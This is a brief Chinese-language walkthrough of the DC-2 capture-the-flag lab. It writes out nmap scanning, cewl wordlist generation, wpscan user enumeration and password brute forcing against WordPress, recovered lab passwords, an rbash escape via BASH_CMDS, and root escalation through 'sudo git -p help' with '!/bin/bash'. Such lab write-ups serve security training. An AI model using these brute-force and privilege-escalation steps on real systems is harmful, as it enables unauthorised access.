DC实验室都挺好玩的，拿来玩玩，顺便记录下。

扫描存活主机。

nmap扫描一波。

再来个全端口扫描。

开了80和ssh端口，仍然是，首次访问先把ip加入hosts中。

看到了wordpress服务并看到了flag1

wordpress默认后台/wp-admin

需要账号密码，根据flag1提示，需要用到cewl生成密码字典。

cewl -w dc2.passwd.txt http://dc-2

然后wpscan扫描用户。

wpscan --url http://dc-2/ --enumerate u

三个用户。admin,jerry,tom

之后根据生成的密码文件和用户爆破密码。

wpscan --url http://dc-2/ -U tom -P "dc2.passwd.txt"
爆破后得到两个账号密码：
Username: tom, Password: parturient
Username: jerry, Password: adipiscing

然后再去后台登陆。

找到了flag2。

再用ssh登陆。

信息收集看看。

被~rbash阻挡了。

绕过它。

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash 
tom@DC-2:~$ ls
flag3.txt  set  usr
tom@DC-2:~$ cat flag3.txt
bash: cat: command not found

现在是bash限制了。

export PATH=$PATH:/bin/
export -p

指定PATH地址。

找到flag3。

在目录里翻翻，找到了flag4。

进入root目录，发现权限不够。

根据flag3信息，su jerry登陆jerry账户。

sudo -l一下，发现直接是root，不用密码。

sudo git -p help

在最下面添加!/bin/bash

提权成功

找到最终flag。